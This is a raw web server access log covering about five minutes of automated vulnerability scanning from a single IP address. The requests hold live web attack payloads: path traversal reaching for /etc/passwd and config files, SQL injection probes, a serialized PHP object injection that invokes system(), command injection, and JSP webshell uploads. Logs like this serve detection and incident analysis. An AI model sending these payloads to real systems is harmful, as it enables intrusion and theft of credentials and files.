205.185.122.202 - - [19/Oct/2025:21:35:07 +0530] "GET /portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:35:10 +0530] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:35:11 +0530] "POST /photo/p/api/album.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:35:14 +0530] "GET /iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:21:35:15 +0530] "GET /defaultroot/officeserverservlet HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:21:35:17 +0530] "POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:21:35:18 +0530] "GET /pentaho/api/userrolelist/systemRoles?require-cfg.js HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:35:18 +0530] "GET /api/userrolelist/systemRoles?require-cfg.js HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:21:35:22 +0530] "POST /login/userverify.cgi HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:35:22 +0530] "POST /login/userverify.cgi HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:35:23 +0530] "GET /users/sign_in HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:35:25 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:35:26 +0530] "POST /install.php?finish HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:35:27 +0530] "POST /admin.php/common/add_images.html HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:35:28 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:35:29 +0530] "GET /update.php?jungle=cat%20/etc/passwd HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:35:30 +0530] "POST /mobile/plugin/VerifyQuickLogin.jsp HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:21:35:33 +0530] "GET /admin/?a=Factory();print(945544872%2b812361711);//../ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:35:33 +0530] "GET /..%2fconf/nhttpd.conf HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:35:35 +0530] "POST /hedwig.cgi HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:35:37 +0530] "GET /s/opentsdb_header.jpg HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:35:38 +0530] "GET /NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:35:39 +0530] "GET /NCFindWeb?service=IPreAlertConfigService&filename=../../../../../../../../../../../../windows/win.ini HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:35:39 +0530] "POST /api/v1/user/login HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:35:41 +0530] "POST /rest/request HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:35:42 +0530] "GET /plugins/web/service/search/auto-completion/domain/en.xml?q=adm HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:21:35:43 +0530] "POST /uai/download/uploadfileToPath.htm HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:21:35:45 +0530] "GET /fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:35:48 +0530] "POST /plugin/customMethod HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:35:49 +0530] "GET /plugin.php?id=wechat:wechat&ac=wxregister HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:35:52 +0530] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:35:53 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:35:58 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:36:01 +0530] "POST /rest/beta/repositories/go/group HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:21:36:03 +0530] "GET /tests/generate.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:36:04 +0530] "GET /yyoa/ext/trafaxserver/downloadAtt.jsp?attach_ids=(1)%20and%201=2%20union%20select%201,2,3,4,5,md5(201673285),7-- HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:21:36:07 +0530] "GET /mobilemode/Action.jsp?invoker=com.weaver.formmodel.mobile.mec.servlet.MECAdminAction&action=getDatasBySQL&datasource=&sql=select%20852625940-991074935&noLogin=1 HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:36:08 +0530] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:21:36:10 +0530] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1144
205.185.122.202 - - [19/Oct/2025:21:36:10 +0530] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 404 1144
205.185.122.202 - - [19/Oct/2025:21:36:11 +0530] "GET /iweboffice/officeserver.php?OPTION=LOADFILE&FILENAME=../mysql_config.ini HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:21:36:13 +0530] "GET /debug/pprof/ HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:36:13 +0530] "POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:21:36:15 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:36:15 +0530] "POST /login/userverify.cgi HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:36:16 +0530] "POST /login/userverify.cgi HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:36:17 +0530] "GET /_config HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:36:18 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:36:19 +0530] "GET /cgi-bin/rpc?action=verify-haras HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:36:20 +0530] "POST /admin.php/common/add_images.html HTTP/1.1" 404 1058
205.185.122.202 - - [19/Oct/2025:21:36:22 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:36:23 +0530] "GET /update.php?jungle=cat%20/etc/passwd HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:36:25 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:36:26 +0530] "GET /admin/?a=Factory();print(814182043%2b910311316);//../ HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:21:36:28 +0530] "GET /wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1110
205.185.122.202 - - [19/Oct/2025:21:36:29 +0530] "GET /wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../windows/win.ini HTTP/1.1" 404 1110
205.185.122.202 - - [19/Oct/2025:21:36:30 +0530] "POST /hedwig.cgi HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:36:33 +0530] "GET /?/member/cart/Fastpay&shopid=-1%20union%20select%20md5(2010324087),2,3,4%20--+ HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:36:35 +0530] "GET /NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:36:36 +0530] "GET /NCFindWeb?service=IPreAlertConfigService&filename=../../../../../../../../../../../../windows/win.ini HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:36:38 +0530] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:21:36:39 +0530] "POST /rest/request HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:36:41 +0530] "POST /search.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:36:42 +0530] "POST /uai/download/uploadfileToPath.htm HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:21:36:45 +0530] "POST /persons HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:36:46 +0530] "POST /plugin/customMethod HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:36:48 +0530] "GET /manager/index.php HTTP/1.1" 404 1538
205.185.122.202 - - [19/Oct/2025:21:36:49 +0530] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:36:51 +0530] "GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(42428517))) HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:36:52 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:36:54 +0530] "GET /webapi/v1/system/accountmanage/account HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:21:36:55 +0530] "GET /tests/generate.php HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:37:00 +0530] "GET /h2-console HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:37:02 +0530] "GET /mobilemode/Action.jsp?invoker=com.weaver.formmodel.mobile.mec.servlet.MECAdminAction&action=getDatasBySQL&datasource=&sql=select%20818531662-850046396&noLogin=1 HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:37:04 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:37:04 +0530] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 1144
205.185.122.202 - - [19/Oct/2025:21:37:05 +0530] "GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 HTTP/1.1" 404 1144
205.185.122.202 - - [19/Oct/2025:21:37:06 +0530] "GET /api/v1/nodes HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:37:07 +0530] "GET /debug/pprof/ HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:37:09 +0530] "GET /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(18263584)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:37:10 +0530] "GET /jmx-console/ HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:37:13 +0530] "GET /download.php?&class=vpn&toolname=../../../../../../../../etc/passwd HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:37:14 +0530] "GET /_config HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:37:16 +0530] "GET /wp-json/wp/v2/posts?per_page=1 HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:37:16 +0530] "GET /cgi-bin/rpc?action=verify-haras HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:37:19 +0530] "GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:37:20 +0530] "GET null null" 400 -
205.185.122.202 - - [19/Oct/2025:21:37:22 +0530] "GET /log/system.log HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:37:23 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:37:24 +0530] "GET /index.htm?PAGE=web HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:37:24 +0530] "GET /wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 1110
205.185.122.202 - - [19/Oct/2025:21:37:25 +0530] "GET /wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../windows/win.ini HTTP/1.1" 404 1110
205.185.122.202 - - [19/Oct/2025:21:37:27 +0530] "GET /index.php?lang=Cn&index=1 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:37:27 +0530] "GET /?/member/cart/Fastpay&shopid=-1%20union%20select%20md5(2082627797),2,3,4%20--+ HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:37:29 +0530] "GET /ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A52%3A%22php+-r+%22echo+md5%28aeurontpqlqexkoakhpypjigvkqouikn%29%3B%22%22%3B%7D HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:37:30 +0530] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:21:37:32 +0530] "GET /login.do?message=44783*42680 HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:37:32 +0530] "GET /manager/login.do?message=44783*42680 HTTP/1.1" 404 1537
205.185.122.202 - - [19/Oct/2025:21:37:32 +0530] "POST /search.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:37:37 +0530] "GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252cmd5%252528145250%252529%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:37:38 +0530] "POST /persons HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:21:37:41 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:37:42 +0530] "POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:21:37:42 +0530] "GET /manager/index.php HTTP/1.1" 404 1538
205.185.122.202 - - [19/Oct/2025:21:37:46 +0530] "GET /cf_scripts/scripts/ajax/package/cfajax.js HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:37:46 +0530] "GET /cf-scripts/scripts/ajax/package/cfajax.js HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:37:47 +0530] "GET /CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:37:47 +0530] "GET /cfide/scripts/ajax/package/cfajax.js HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:37:47 +0530] "GET /CF_SFSD/scripts/ajax/package/cfajax.js HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:21:37:47 +0530] "GET /cfide-scripts/ajax/package/cfajax.js HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:37:48 +0530] "GET /cfmx/CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:37:48 +0530] "GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(17020056))) HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:37:50 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:37:51 +0530] "GET /webapi/v1/system/accountmanage/account HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:21:37:54 +0530] "GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:37:55 +0530] "GET /h2-console HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:37:58 +0530] "POST /data/login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:37:58 +0530] "POST /cgi-bin/webcgi/login HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:37:58 +0530] "POST /Applications/dellUI/RPC/WEBSES/create.asp HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:37:59 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:38:01 +0530] "GET /sy/show_JVM_para.jsp HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:38:02 +0530] "GET /api/v1/nodes HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:38:05 +0530] "GET /mobile/index/index2/id/1%29%20and%20%28select%201%20from%20%28select%20count%28%2A%29,concat%280x716b627671,%28select%20md5%28840770121%29%29,0x716b627671,floor%28rand%280%29%2A2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29-- HTTP/1.1" 404 1486
205.185.122.202 - - [19/Oct/2025:21:38:06 +0530] "GET /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(18159616)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:38:09 +0530] "POST /boafrm/formSysCmd HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:38:10 +0530] "GET /download.php?&class=vpn&toolname=../../../../../../../../etc/passwd HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:21:38:12 +0530] "GET /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:38:12 +0530] "GET /wp-json/wp/v2/posts?per_page=1 HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:38:13 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:38:14 +0530] "GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:21:38:16 +0530] "POST /Proxy HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:21:38:17 +0530] "GET /log/system.log HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:21:38:20 +0530] "POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/jkxvtcazeymeynualrft.jsp&fileId=2 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:38:20 +0530] "GET /index.htm?PAGE=web HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:38:23 +0530] "GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:38:24 +0530] "GET /index.php?lang=Cn&index=1 HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:38:27 +0530] "GET /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:21:38:28 +0530] "GET /ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A52%3A%22php+-r+%22echo+md5%28sptphskkqdskqxbgelejscmslyiqkrjp%29%3B%22%22%3B%7D HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:38:31 +0530] "GET /do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8 HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:38:32 +0530] "GET /login.do?message=44680*40546 HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:21:38:32 +0530] "GET /manager/login.do?message=44680*40546 HTTP/1.1" 404 1537
205.185.122.202 - - [19/Oct/2025:21:38:35 +0530] "PUT /_snapshot/fmyo HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:38:35 +0530] "GET /?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252cmd5%252528152753%252529%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:38:37 +0530] "GET /owa/auth/x.js HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:38:38 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:38:39 +0530] "POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:21:38:40 +0530] "POST /wp-content/plugins/superstorefinder-wp/ssf-social-action.php HTTP/1.1" 404 1114
205.185.122.202 - - [19/Oct/2025:21:38:41 +0530] "GET /cf_scripts/scripts/ajax/package/cfajax.js HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:38:41 +0530] "GET /cf-scripts/scripts/ajax/package/cfajax.js HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:38:41 +0530] "GET /CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:38:41 +0530] "GET /cfide/scripts/ajax/package/cfajax.js HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:38:42 +0530] "GET /CF_SFSD/scripts/ajax/package/cfajax.js HTTP/1.1" 404 1070
205.185.122.202 - - [19/Oct/2025:21:38:42 +0530] "GET /cfide-scripts/ajax/package/cfajax.js HTTP/1.1" 404 1066
205.185.122.202 - - [19/Oct/2025:21:38:42 +0530] "GET /cfmx/CFIDE/scripts/ajax/package/cfajax.js HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:38:43 +0530] "GET /system/mediafile/templateOfTaohong_manager.jsp?path=/../../../ HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:21:38:43 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:38:45 +0530] "POST /ztp/cgi-bin/handler HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:38:46 +0530] "GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:21:38:48 +0530] "GET /about_state HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:38:49 +0530] "POST /data/login HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:38:49 +0530] "POST /cgi-bin/webcgi/login HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:38:49 +0530] "POST /Applications/dellUI/RPC/WEBSES/create.asp HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:38:51 +0530] "GET /him/api/rest/V1.0/system/log/list?filePath=../ HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:21:38:52 +0530] "GET /sy/show_JVM_para.jsp HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:21:38:53 +0530] "GET /interlib/report/ShowImage?localPath=../etc/passwd HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:38:54 +0530] "GET /interlib/report/ShowImage?localPath=C:/Windows/win.ini HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:38:54 +0530] "GET /mobile/index/index2/id/1%29%20and%20%28select%201%20from%20%28select%20count%28%2A%29,concat%280x716b627671,%28select%20md5%28817300255%29%29,0x716b627671,floor%28rand%280%29%2A2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29-- HTTP/1.1" 404 1486
205.185.122.202 - - [19/Oct/2025:21:38:57 +0530] "GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1" 404 1362
205.185.122.202 - - [19/Oct/2025:21:38:57 +0530] "GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc%255cpasswd HTTP/1.1" 404 1352
205.185.122.202 - - [19/Oct/2025:21:38:58 +0530] "POST /boafrm/formSysCmd HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:21:39:00 +0530] "GET /admin/protected/selector/server_file/files?folder=/ HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:21:39:01 +0530] "GET /general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php HTTP/1.1" 404 1076
205.185.122.202 - - [19/Oct/2025:21:39:03 +0530] "POST /wp-json/am-member/license HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:39:04 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:21:39:07 +0530] "GET /mobile/DBconfigReader.jsp HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:21:39:08 +0530] "POST /Proxy HTTP/1.1" 404 1004
205.185.122.202 - - [19/Oct/2025:21:39:10 +0530] "PUT /dgukkp.jsp/ HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:39:11 +0530] "POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/wfzxuzwcxyxhqvajvngz.jsp&fileId=2 HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:21:39:12 +0530] "POST /ispirit/interface/gateway.php HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:21:39:13 +0530] "POST /mac/gateway.php HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:21:39:13 +0530] "GET /nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:21:39:15 +0530] "POST /seeyon/htmlofficeservlet HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:21:39:16 +0530] "GET /userLogin.asp/../actionpolicy_status/../ER5200G2.cfg HTTP/1.1" 404 1098
205.185.122.202 - - [19/Oct/2025:21:39:19 +0530] "GET /general/login_code.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:39:19 +0530] "GET /ispirit/login_code.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:21:39:20 +0530] "GET /do/job.php?job=download&url=ZGF0YS9jb25maWcucGg8 HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:21:39:24 +0530] "PUT /_snapshot/tdaw HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:21:39:27 +0530] "GET /owa/auth/x.js HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:21:39:31 +0530] "POST /wp-content/plugins/superstorefinder-wp/ssf-social-action.php HTTP/1.1" 404 1114
205.185.122.202 - - [19/Oct/2025:21:39:34 +0530] "GET /system/mediafile/templateOfTaohong_manager.jsp?path=/../../../ HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:21:39:39 +0530] "POST /ztp/cgi-bin/handler HTTP/1.1" 404 1032
205.185.122.202 - - [19/Oct/2025:21:39:42 +0530] "GET /about_state HTTP/1.1" 404 1016
205.185.122.202 - - [19/Oct/2025:21:39:45 +0530] "GET /him/api/rest/V1.0/system/log/list?filePath=../ HTTP/1.1" 404 1060
